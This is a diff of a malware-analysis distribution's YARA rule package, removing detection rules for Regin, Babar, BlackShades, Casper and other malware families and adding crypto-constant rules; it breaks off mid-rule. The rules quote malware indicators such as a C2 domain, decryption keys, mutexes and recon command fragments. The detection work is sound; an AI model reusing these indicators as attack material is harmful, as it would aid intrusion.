-		description = "Auto-generated rule - file SHF-000052 and ndisips.sys"
-		author = "@MalwrSignatures"
-		date = "26.11.14"
-		hash1 = "8487a961c8244004c9276979bb4b0c14392fc3b8"
-		hash2 = "bcf3461d67b39a427c83f9e39b9833cfec977c61"		
-	strings:
-		$s0 = "HAL.dll" fullword ascii
-		$s1 = "IoGetDeviceObjectPointer" fullword ascii
-		$s2 = "MaximumPortsServiced" fullword wide
-		$s3 = "KeGetCurrentIrql" fullword ascii
-		$s4 = "ntkrnlpa.exe" fullword ascii
-		$s5 = "\\REGISTRY\\Machine\\System\\CurrentControlSet\\Control\\Session Manager" wide
-		$s6 = "ConnectMultiplePorts" fullword wide
-		$s7 = "\\SYSTEMROOT" fullword wide
-		$s8 = "IoWriteErrorLogEntry" fullword ascii
-		$s9 = "KeQueryPerformanceCounter" fullword ascii
-		$s10 = "KeServiceDescriptorTable" fullword ascii
-		$s11 = "KeRemoveEntryDeviceQueue" fullword ascii
-		$s12 = "SeSinglePrivilegeCheck" fullword ascii
-		$s13 = "KeInitializeEvent" fullword ascii
-		$s14 = "IoBuildDeviceIoControlRequest" fullword ascii
-		$s15 = "KeRemoveDeviceQueue" fullword ascii
-		$s16 = "IofCompleteRequest" fullword ascii
-		$s17 = "KeInitializeSpinLock" fullword ascii
-		$s18 = "MmIsNonPagedSystemAddressValid" fullword ascii
-		$s19 = "IoCreateDevice" fullword ascii
-		$s20 = "KefReleaseSpinLockFromDpcLevel" fullword ascii
-	condition:
-		all of them and filesize < 40KB and filesize > 30KB
-}
-
-rule Regin_Sample_Set_2 {
-	meta:
-		description = "Detects Regin Backdoor sample 4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be and e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
-		author = "@MalwrSignatures"
-		date = "27.11.14"
-		hash1 = "4139149552b0322f2c5c993abccc0f0d1b38db4476189a9f9901ac0d57a656be"
-		hash2 = "e420d0cf7a7983f78f5a15e6cb460e93c7603683ae6c41b27bf7f2fa34b2d935"
-	strings:
-		$hd = { fe ba dc fe }
-	
-		$s0 = "d%ls%ls" fullword wide
-		$s1 = "\\\\?\\UNC" fullword wide
-		$s2 = "Software\\Microsoft\\Windows\\CurrentVersion" fullword wide
-		$s3 = "\\\\?\\UNC\\" fullword wide
-		$s4 = "SYSTEM\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}" fullword wide
-		$s5 = "System\\CurrentControlSet\\Services\\Tcpip\\Linkage" wide fullword
-		$s6 = "\\\\.\\Global\\%s" fullword wide
-		$s7 = "temp" fullword wide
-		$s8 = "\\\\.\\%s" fullword wide
-		$s9 = "Memory location: 0x%p, size 0x%08x" fullword wide		
-		
-		$s10 = "sscanf" fullword ascii
-		$s11 = "disp.dll" fullword ascii
-		$s12 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii
-		$s13 = "%d.%d.%d.%d%c" fullword ascii
-		$s14 = "imagehlp.dll" fullword ascii
-		$s15 = "%hd %d" fullword ascii
-	condition:
-		( $hd at 0 ) and all of ($s*) and filesize < 450KB and filesize > 360KB
-}
-
-rule apt_regin_legspin {
-	meta:
-	    copyright = "Kaspersky Lab"
-	    description = "Rule to detect Regin's Legspin module"
-	    version = "1.0"
-	    last_modified = "2015-01-22"
-	    reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
-	    md5 = "29105f46e4d33f66fee346cfd099d1cc"
-	strings:
-	    $mz="MZ"
-	    $a1="sharepw"
-	    $a2="reglist"
-	    $a3="logdump"
-	    $a4="Name:" wide
-	    $a5="Phys Avail:"
-	    $a6="cmd.exe" wide
-	    $a7="ping.exe" wide
-	    $a8="millisecs"
-	condition:
-	    ($mz at 0) and all of ($a*)
-}
-
-rule apt_regin_hopscotch {
-	meta:
-	    copyright = "Kaspersky Lab"
-	    description = "Rule to detect Regin's Hopscotch module"
-	    version = "1.0"
-	    last_modified = "2015-01-22"
-	    reference = "https://securelist.com/blog/research/68438/an-analysis-of-regins-hopscotch-and-legspin/"
-	    md5 = "6c34031d7a5fc2b091b623981a8ae61c"
-	strings:
-
-	    $mz="MZ"
-
-	    $a1="AuthenticateNetUseIpc"
-	    $a2="Failed to authenticate to"
-	    $a3="Failed to disconnect from"
-	    $a4="%S\\ipc$" wide
-	    $a5="Not deleting..."
-	    $a6="CopyServiceToRemoteMachine"
-	    $a7="DH Exchange failed"
-	    $a8="ConnectToNamedPipes"
-	condition:
-	    ($mz at 0) and all of ($a*)
-}
-
-
-rule apt_regin_2011_32bit_stage1 {
-meta:
-copyright = "Kaspersky Lab"
- description = "Rule to detect Regin 32 bit stage 1 loaders"
- version = "1.0"
- last_modified = "2014-11-18"
-strings:
-$key1={331015EA261D38A7}
-$key2={9145A98BA37617DE}
-$key3={EF745F23AA67243D}
-$mz="MZ"
-condition:
-($mz at 0) and any of ($key*) and filesize < 300000
-}
-rule apt_regin_rc5key {
-meta:
-copyright = "Kaspersky Lab"
- description = "Rule to detect Regin RC5 decryption keys"
- version = "1.0"
- last_modified = "2014-11-18"
-strings:
-$key1={73 23 1F 43 93 E1 9F 2F 99 0C 17 81 5C FF B4 01}
-$key2={10 19 53 2A 11 ED A3 74 3F C3 72 3F 9D 94 3D 78}
-condition:
-any of ($key*)
-}
-
-rule apt_regin_vfs {
-meta:
-	copyright = "Kaspersky Lab"
-	author = "Kaspersky Lab"
-	description = "Rule to detect Regin VFSes"
-	version = "1.0"
-	last_modified = "2014-11-18"
-strings:
-	$a1={00 02 00 08 00 08 03 F6 D7 F3 52}
-	$a2={00 10 F0 FF F0 FF 11 C7 7F E8 52}
-	$a3={00 04 00 10 00 10 03 C2 D3 1C 93}
-	$a4={00 04 00 10 C8 00 04 C8 93 06 D8}
-condition:
-	($a1 at 0) or ($a2 at 0) or ($a3 at 0) or ($a4 at 0)
-}
-
-rule apt_regin_dispatcher_disp_dll {
-
-meta:
-	copyright = "Kaspersky Lab"
-	author = "Kaspersky Lab"
-	description = "Rule to detect Regin disp.dll dispatcher"
-	version = "1.0"
-	last_modified = "2014-11-18"
-
-strings:
-	$mz="MZ"
-	$string1="shit"
-	$string2="disp.dll"
-	$string3="255.255.255.255"
-	$string4="StackWalk64"
-	$string5="imagehlp.dll"
-condition:
-	($mz at 0) and (all of ($string*))
-}
-
-rule apt_regin_2013_64bit_stage1 {
-meta:
-copyright = "Kaspersky Lab"
- description = "Rule to detect Regin 64 bit stage 1 loaders"
- version = "1.0"
- last_modified = "2014-11-18"
- filename="wshnetc.dll"
- md5="bddf5afbea2d0eed77f2ad4e9a4f044d"
- filename="wsharp.dll"
- md5="c053a0a3f1edcbbfc9b51bc640e808ce"
-strings:
-$mz="MZ"
-$a1="PRIVHEAD"
-$a2="\\\\.\\PhysicalDrive%d"
-$a3="ZwDeviceIoControlFile"
-condition:
-($mz at 0) and (all of ($a*)) and filesize < 100000
-}
-
diff -Nru remnux-rules-0.0.3/yara/Babar.yara remnux-rules-0.0.4/yara/Babar.yara
--- remnux-rules-0.0.3/yara/Babar.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Babar.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,40 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule SNOWGLOBE_Babar_Malware {
-	meta:
-		description = "Detects the Babar Malware used in the SNOWGLOBE attacks - file babar.exe"
-		author = "Florian Roth"
-		reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france"
-		date = "2015/02/18"
-		hash = "27a0a98053f3eed82a51cdefbdfec7bb948e1f36"
-		score = 80
-	strings:
-		$mz = { 4d 5a }
-		$z0 = "admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper" ascii fullword
-		$z1 = "User-Agent: Mozilla/4.0 (compatible; MSI 6.0;" ascii fullword
-		$z2 = "ExecQueryFailled!" fullword ascii
-		$z3 = "NBOT_COMMAND_LINE" fullword
-		$z4 = "!!!EXTRACT ERROR!!!File Does Not Exists-->[%s]" fullword
-
-		$s1 = "/s /n %s \"%s\"" fullword ascii
-		$s2 = "%%WINDIR%%\\%s\\%s" fullword ascii
-		$s3 = "/c start /wait " fullword ascii
-		$s4 = "(D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)" ascii
-
-		$x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" fullword ascii
-		$x2 = "%COMMON_APPDATA%" fullword ascii
-		$x4 = "CONOUT$" fullword ascii
-		$x5 = "cmd.exe" fullword ascii
-		$x6 = "DLLPATH" fullword ascii
-	condition:
-		( $mz at 0 ) and filesize < 1MB and
-		(
-			( 1 of ($z*) and 1 of ($x*) ) or
-			( 3 of ($s*) and 4 of ($x*) )
-		)
-}
diff -Nru remnux-rules-0.0.3/yara/Bangat.yara remnux-rules-0.0.4/yara/Bangat.yara
--- remnux-rules-0.0.3/yara/Bangat.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Bangat.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,54 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule BangatCode : Bangat Family 
-{
-    meta:
-        description = "Bangat code features"
-        author = "Seth Hardy"
-        last_modified = "2014-07-10"
-    
-    strings:
-        // dec [ebp + procname], push eax, push edx, call get procaddress
-        $ = { FE 4D ?? 8D 4? ?? 50 5? FF }
-    
-    condition:
-        any of them
-}
-
-rule BangatStrings : Bangat Family
-{
-    meta:
-        description = "Bangat Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-07-10"
-        
-    strings:
-        $lib1 = "DreatePipe"
-        $lib2 = "HetSystemDirectoryA"
-        $lib3 = "SeleaseMutex"
-        $lib4 = "DloseWindowStation"
-        $lib5 = "DontrolService"
-        $file = "~hhC2F~.tmp"
-        $mc = "~_MC_3~"
-
-    condition:
-       all of ($lib*) or $file or $mc
-}
-
-rule Bangat : Family
-{
-    meta:
-        description = "Bangat"
-        author = "Seth Hardy"
-        last_modified = "2014-07-10"
-        
-    condition:
-        BangatCode or BangatStrings
-}
-
-
diff -Nru remnux-rules-0.0.3/yara/BlackEnergy.yara remnux-rules-0.0.4/yara/BlackEnergy.yara
--- remnux-rules-0.0.3/yara/BlackEnergy.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/BlackEnergy.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,24 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule BlackEnergy_BE_2 {
-        meta:
-                description = "Detects BlackEnergy 2 Malware"
-                author = "Florian Roth"
-                reference = "http://goo.gl/DThzLz"
-                date = "2015/02/19"
-                hash = "983cfcf3aaaeff1ad82eb70f77088ad6ccedee77"
-        strings:
-                $mz = { 4d 5a }
-                $s0 = "<description> Windows system utility service  </description>" fullword ascii
-                $s1 = "WindowsSysUtility - Unicode" fullword wide
-                $s2 = "msiexec.exe" fullword wide
-                $s3 = "WinHelpW" fullword ascii
-                $s4 = "ReadProcessMemory" fullword ascii
-        condition:
-                ( $mz at 0 ) and filesize < 250KB and all of ($s*)
-}
diff -Nru remnux-rules-0.0.3/yara/BlackShades.yara remnux-rules-0.0.4/yara/BlackShades.yara
--- remnux-rules-0.0.3/yara/BlackShades.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/BlackShades.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,118 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule BlackShades_3 : Trojan
-{
-    meta:
-        description = "BlackShades RAT"
-	author = "botherder https://github.com/botherder"
-
-    strings:
-        $mod1 = /(m)odAPI/
-        $mod2 = /(m)odAudio/
-        $mod3 = /(m)odBtKiller/
-        $mod4 = /(m)odCrypt/
-        $mod5 = /(m)odFuctions/
-        $mod6 = /(m)odHijack/
-        $mod7 = /(m)odICallBack/
-        $mod8 = /(m)odIInet/
-        $mod9 = /(m)odInfect/
-        $mod10 = /(m)odInjPE/
-        $mod11 = /(m)odLaunchWeb/
-        $mod12 = /(m)odOS/
-        $mod13 = /(m)odPWs/
-        $mod14 = /(m)odRegistry/
-        $mod15 = /(m)odScreencap/
-        $mod16 = /(m)odSniff/
-        $mod17 = /(m)odSocketMaster/
-        $mod18 = /(m)odSpread/
-        $mod19 = /(m)odSqueezer/
-        $mod20 = /(m)odSS/
-        $mod21 = /(m)odTorrentSeed/
-
-        $tmr1 = /(t)mrAlarms/
-        $tmr2 = /(t)mrAlive/
-        $tmr3 = /(t)mrAnslut/
-        $tmr4 = /(t)mrAudio/
-        $tmr5 = /(t)mrBlink/
-        $tmr6 = /(t)mrCheck/
-        $tmr7 = /(t)mrCountdown/
-        $tmr8 = /(t)mrCrazy/
-        $tmr9 = /(t)mrDOS/
-        $tmr10 = /(t)mrDoWork/
-        $tmr11 = /(t)mrFocus/
-        $tmr12 = /(t)mrGrabber/
-        $tmr13 = /(t)mrInaktivitet/
-        $tmr14 = /(t)mrInfoTO/
-        $tmr15 = /(t)mrIntervalUpdate/
-        $tmr16 = /(t)mrLiveLogger/
-        $tmr17 = /(t)mrPersistant/
-        $tmr18 = /(t)mrScreenshot/
-        $tmr19 = /(t)mrSpara/
-        $tmr20 = /(t)mrSprid/
-        $tmr21 = /(t)mrTCP/
-        $tmr22 = /(t)mrUDP/
-        $tmr23 = /(t)mrWebHide/
-
-    condition:    
-        10 of ($mod*) or 10 of ($tmr*)
-}
-
-rule BlackShades2 : Trojan
-{
-	meta:
-		author="Kevin Falcoz"
-		date="26/06/2013"
-		description="BlackShades Server"
-		
-	strings:
-		$signature1={62 73 73 5F 73 65 72 76 65 72}
-		$signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44}
-		$signature3={6D 6F 64 49 6E 6A 50 45}
-		
-	condition:
-		$signature1 and $signature2 and $signature3
-}
-
-rule BlackShades_4 : rat
-{
-	meta:
-		description = "BlackShades"
-		author = "Jean-Philippe Teissier / @Jipe_"
-		date = "2013-01-12"
-		filetype = "memory"
-		version = "1.0" 
-
-	strings:
-		$a = { 42 00 6C 00 61 00 63 00 6B 00 73 00 68 00 61 00 64 00 65 00 73 }
-		$b = { 36 00 3C 00 32 00 20 00 32 00 32 00 26 00 31 00 39 00 3E 00 1D 00 17 00 17 00 1C 00 07 00 1B 00 03 00 07 00 28 00 23 00 0C 00 1D 00 10 00 1B 00 12 00 00 00 28 00 37 00 10 00 01 00 06 00 11 00 0B 00 07 00 22 00 11 00 17 00 00 00 1D 00 1B 00 0B 00 2F 00 26 00 01 00 0B }
-		$c = { 62 73 73 5F 73 65 72 76 65 72 }
-		$d = { 43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44 }
-		$e = { 6D 6F 64 49 6E 6A 50 45 }
-		$apikey = "f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439"
-
-	condition:
-		any of ($a, $b, $c, $d, $e) or $apikey		
-}
-
-
-rule BlackShades : Trojan
-{
-	meta:
-		author="Kevin Falcoz"
-		date="26/06/2013"
-		description="BlackShades Server"
-		
-	strings:
-		$signature1={62 73 73 5F 73 65 72 76 65 72}
-		$signature2={43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44}
-		$signature3={6D 6F 64 49 6E 6A 50 45}
-		
-	condition:
-		$signature1 and $signature2 and $signature3
-}
-
diff -Nru remnux-rules-0.0.3/yara/Bolonyokte.yara remnux-rules-0.0.4/yara/Bolonyokte.yara
--- remnux-rules-0.0.3/yara/Bolonyokte.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Bolonyokte.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,52 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Bolonyokte : rat 
-{
-	meta:
-		description = "UnknownDotNet RAT - Bolonyokte"
-		author = "Jean-Philippe Teissier / @Jipe_"
-		date = "2013-02-01"
-		filetype = "memory"
-		version = "1.0" 
-
-	strings:
-		$campaign1 = "Bolonyokte" ascii wide
-		$campaign2 = "donadoni" ascii wide
-		
-		$decoy1 = "nyse.com" ascii wide
-		$decoy2 = "NYSEArca_Listing_Fees.pdf" ascii wide
-		$decoy3 = "bf13-5d45cb40" ascii wide
-		
-		$artifact1 = "Backup.zip"  ascii wide
-		$artifact2 = "updates.txt" ascii wide
-		$artifact3 = "vdirs.dat" ascii wide
-		$artifact4 = "default.dat"
-		$artifact5 = "index.html"
-		$artifact6 = "mime.dat"
-		
-		$func1 = "FtpUrl"
-		$func2 = "ScreenCapture"
-		$func3 = "CaptureMouse"
-		$func4 = "UploadFile"
-
-		$ebanking1 = "Internet Banking" wide
-		$ebanking2 = "(Online Banking)|(Online banking)"
-		$ebanking3 = "(e-banking)|(e-Banking)" nocase
-		$ebanking4 = "login"
-		$ebanking5 = "en ligne" wide
-		$ebanking6 = "bancaires" wide
-		$ebanking7 = "(eBanking)|(Ebanking)" wide
-		$ebanking8 = "Anmeldung" wide
-		$ebanking9 = "internet banking" nocase wide
-		$ebanking10 = "Banking Online" nocase wide
-		$ebanking11 = "Web Banking" wide
-		$ebanking12 = "Power"
-
-	condition:
-		any of ($campaign*) or 2 of ($decoy*) or 2 of ($artifact*) or all of ($func*) or 3 of ($ebanking*)
-}
diff -Nru remnux-rules-0.0.3/yara/Boouset.yara remnux-rules-0.0.4/yara/Boouset.yara
--- remnux-rules-0.0.3/yara/Boouset.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Boouset.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,21 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule BoousetCode : Boouset Family 
-{
-    meta:
-        description = "Boouset code tricks"
-        author = "Seth Hardy"
-        last_modified = "2014-06-19"
-        
-    strings:
-        $boousetdat = { C6 ?? ?? ?? ?? 00 62 C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 6F C6 ?? ?? ?? ?? 00 75 }
-        
-    condition:
-        any of them
-}
-
diff -Nru remnux-rules-0.0.3/yara/Bublik_downloader.yara remnux-rules-0.0.4/yara/Bublik_downloader.yara
--- remnux-rules-0.0.3/yara/Bublik_downloader.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Bublik_downloader.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,21 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Bublik : Downloader
-{
-	meta:
-		author="Kevin Falcoz"
-		date="29/09/2013"
-		description="Bublik Trojan Downloader"
-		
-	strings:
-		$signature1={63 6F 6E 73 6F 6C 61 73}
-		$signature2={63 6C 55 6E 00 69 6E 66 6F 2E 69 6E 69}
-		
-	condition:
-		$signature1 and $signature2
-}
diff -Nru remnux-rules-0.0.3/yara/Casper.yara remnux-rules-0.0.4/yara/Casper.yara
--- remnux-rules-0.0.3/yara/Casper.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Casper.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,101 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Casper_Backdoor_x86 {
-	meta:
-		description = "Casper French Espionage Malware - Win32/ProxyBot.B - x86 Payload http://goo.gl/VRJNLo"
-		author = "Florian Roth"
-		reference = "http://goo.gl/VRJNLo"
-		date = "2015/03/05"
-		hash = "f4c39eddef1c7d99283c7303c1835e99d8e498b0"
-		score = 80
-	strings:
-		$s1 = "\"svchost.exe\"" fullword wide
-		$s2 = "firefox.exe" fullword ascii
-		$s3 = "\"Host Process for Windows Services\"" fullword wide
-		
-		$x1 = "\\Users\\*" fullword ascii
-		$x2 = "\\Roaming\\Mozilla\\Firefox\\Profiles\\*" fullword ascii
-		$x3 = "\\Mozilla\\Firefox\\Profiles\\*" fullword ascii
-		$x4 = "\\Documents and Settings\\*" fullword ascii
-		
-		$y1 = "%s; %S=%S" fullword wide
-		$y2 = "%s; %s=%s" fullword ascii
-		$y3 = "Cookie: %s=%s" fullword ascii
-		$y4 = "http://%S:%d" fullword wide
-		
-		$z1 = "http://google.com/" fullword ascii
-		$z2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)" fullword ascii
-		$z3 = "Operating System\"" fullword wide
-	condition:
-		( all of ($s*) ) or
-		( 3 of ($x*) and 2 of ($y*) and 2 of ($z*) )
-}
-
-rule Casper_EXE_Dropper {
-	meta:
-		description = "Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo"
-		author = "Florian Roth"
-		reference = "http://goo.gl/VRJNLo"
-		date = "2015/03/05"
-		hash = "e4cc35792a48123e71a2c7b6aa904006343a157a"
-		score = 80
-	strings:
-		$s0 = "<Command>" fullword ascii
-		$s1 = "</Command>" fullword ascii
-		$s2 = "\" /d \"" fullword ascii
-		$s4 = "'%s' %s" fullword ascii
-		$s5 = "nKERNEL32.DLL" fullword wide
-		$s6 = "@ReturnValue" fullword wide
-		$s7 = "ID: 0x%x" fullword ascii
-		$s8 = "Name: %S" fullword ascii
-	condition:
-		7 of them
-}
-
-rule Casper_Included_Strings {
-	meta:
-		description = "Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo"
-		author = "Florian Roth"
-		reference = "http://goo.gl/VRJNLo"
-		date = "2015/03/06"
-		score = 50
-	strings:
-		$a0 = "cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST"
-		$a1 = "& SYSTEMINFO) ELSE EXIT"
-		
-		$mz = { 4d 5a }
-		$c1 = "domcommon.exe" wide fullword							// File Name
-		$c2 = "jpic.gov.sy" fullword 								// C2 Server
-		$c3 = "aiomgr.exe" wide fullword							// File Name
-		$c4 = "perfaudio.dat" fullword								// Temp File Name
-		$c5 = "Casper_DLL.dll" fullword								// Name 
-		$c6 = { 7B 4B 59 DE 37 4A 42 26 59 98 63 C6 2D 0F 57 40 } 	// Decryption Key
-		$c7 = "{4216567A-4512-9825-7745F856}" fullword 				// Mutex
-	condition:
-		all of ($a*) or
-		( $mz at 0 ) and ( 1 of ($c*) )
-}
-
-rule Casper_SystemInformation_Output {
-	meta:
-		description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
-		author = "Florian Roth"
-		reference = "http://goo.gl/VRJNLo"
-		date = "2015/03/06"
-		score = 70	
-	strings:
-		$a0 = "***** SYSTEM INFORMATION ******"
-		$a1 = "***** SECURITY INFORMATION ******"
-		$a2 = "Antivirus: "
-		$a3 = "Firewall: "
-		$a4 = "***** EXECUTION CONTEXT ******"
-		$a5 = "Identity: "
-		$a6 = "<CONFIG TIMESTAMP="
-	condition:
-		all of them
-}
diff -Nru remnux-rules-0.0.3/yara/Cerberus.yara remnux-rules-0.0.4/yara/Cerberus.yara
--- remnux-rules-0.0.3/yara/Cerberus.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Cerberus.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,25 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule Cerberus : rat
-{
-	meta:
-		description = "Cerberus"
-		author = "Jean-Philippe Teissier / @Jipe_"
-		date = "2013-01-12"
-		filetype = "memory"
-		version = "1.0" 
-
-	strings:
-		$checkin = "Ypmw1Syv023QZD"
-		$clientpong = "wZ2pla"
-		$serverping = "wBmpf3Pb7RJe"
-		$generic = "cerberus" nocase
-
-	condition:
-		any of them
-}
diff -Nru remnux-rules-0.0.3/yara/Cookies.yara remnux-rules-0.0.4/yara/Cookies.yara
--- remnux-rules-0.0.3/yara/Cookies.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Cookies.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,46 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule CookiesStrings : Cookies Family
-{
-    meta:
-        description = "Cookies Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-20"
-        
-    strings:
-        $zip1 = "ntdll.exePK"
-        $zip2 = "AcroRd32.exePK"
-        $zip3 = "Setup=ntdll.exe\x0d\x0aSilent=1\x0d\x0a"
-        $zip4 = "Setup=%temp%\\AcroRd32.exe\x0d\x0a"
-        $exe1 = "Leave GetCommand!"
-        $exe2 = "perform exe success!"
-        $exe3 = "perform exe failure!"
-        $exe4 = "Entry SendCommandReq!"
-        $exe5 = "Reqfile not exist!"
-        $exe6 = "LeaveDealUpfile!"
-        $exe7 = "Entry PostData!"
-        $exe8 = "Leave PostFile!"
-        $exe9 = "Entry PostFile!"
-        $exe10 = "\\unknow.zip" wide ascii
-        $exe11 = "the url no respon!"
-        
-    condition:
-      (2 of ($zip*)) or (2 of ($exe*))
-}
-
-rule Cookies : Family
-{
-    meta:
-        description = "Cookies"
-        author = "Seth Hardy"
-        last_modified = "2014-06-20"
-        
-    condition:
-        CookiesStrings
-}
-
diff -Nru remnux-rules-0.0.3/yara/crypto.yar remnux-rules-0.0.4/yara/crypto.yar
--- remnux-rules-0.0.3/yara/crypto.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/crypto.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,166 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule BLOWFISH_Constants: crypto {
+        meta:
+                author = "phoul (@phoul)"
+                description = "Look for Blowfish constants"
+                date = "2014-01"
+                version = "0.1"
+        strings:
+		$c0 = { D1310BA6 }
+		$c1 = { A60B31D1 }	
+		$c2 = { 98DFB5AC }
+		$c3 = { ACB5DF98 }
+		$c4 = { 2FFD72DB }
+		$c5 = { DB72FD2F }
+		$c6 = { D01ADFB7 }
+		$c7 = { B7DF1AD0 }
+		$c8 = { 4B7A70E9 }
+		$c9 = { E9707A4B }
+		$c10 = { F64C261C }
+		$c11 = { 1C264CF6 }
+	condition:
+                6 of them
+}
+
+rule MD5_Constants : crypto {
+        meta:
+                author = "phoul (@phoul)"
+                description = "Look for MD5 constants"
+                date = "2014-01"
+                version = "0.2"
+        strings:
+		// Init constants
+		$c0 = { 67452301 }
+		$c1 = { efcdab89 }
+		$c2 = { 98badcfe }
+		$c3 = { 10325476 }
+		$c4 = { 01234567 }
+		$c5 = { 89ABCDEF }
+		$c6 = { FEDCBA98 }
+		$c7 = { 76543210 }	
+		// Round 2
+		$c8 = { F4D50d87 }
+		$c9 = { 78A46AD7 }
+	condition:
+                5 of them
+}
+
+rule RC6_Constants : crypto {
+        meta:
+                author = "chort (@chort0)"
+                description = "Look for RC6 magic constants in binary"
+                reference = "https://twitter.com/mikko/status/417620511397400576"
+                reference2 = "https://twitter.com/dyngnosis/status/418105168517804033"
+                date = "2013-12"
+                version = "0.2"
+        strings:
+                $c1 = { B7E15163 }
+                $c2 = { 9E3779B9 }
+                $c3 = { 6351E1B7 }
+                $c4 = { B979379E }
+        condition:
+                2 of them
+}
+
+rule RIPEMD160_Constants : crypto {
+        meta:
+                author = "phoul (@phoul)"
+                description = "Look for RIPEMD-160 constants"
+                date = "2014-01"
+                version = "0.1"
+        strings:
+		$c0 = { 67452301 }
+		$c1 = { EFCDAB89 }
+		$c2 = { 98BADCFE }
+		$c3 = { 10325476 }
+		$c4 = { C3D2E1F0 }
+		$c5 = { 01234567 }
+		$c6 = { 89ABCDEF }
+		$c7 = { FEDCBA98 }
+		$c8 = { 76543210 }
+		$c9 = { F0E1D2C3 }
+	condition:
+		5 of them
+}
+rule SHA1_Constants : crypto {
+        meta:
+                author = "phoul (@phoul)"
+                description = "Look for SHA1 constants"
+                date = "2014-01"
+                version = "0.1"
+        strings:
+		$c0 = { 67452301 }
+		$c1 = { EFCDAB89 }
+		$c2 = { 98BADCFE }
+		$c3 = { 10325476 }
+		$c4 = { C3D2E1F0 }
+		$c5 = { 01234567 }
+		$c6 = { 89ABCDEF }
+		$c7 = { FEDCBA98 }
+		$c8 = { 76543210 }
+		$c9 = { F0E1D2C3 }
+	condition:
+                5 of them
+}
+
+rule SHA512_Constants : crypto {
+        meta:
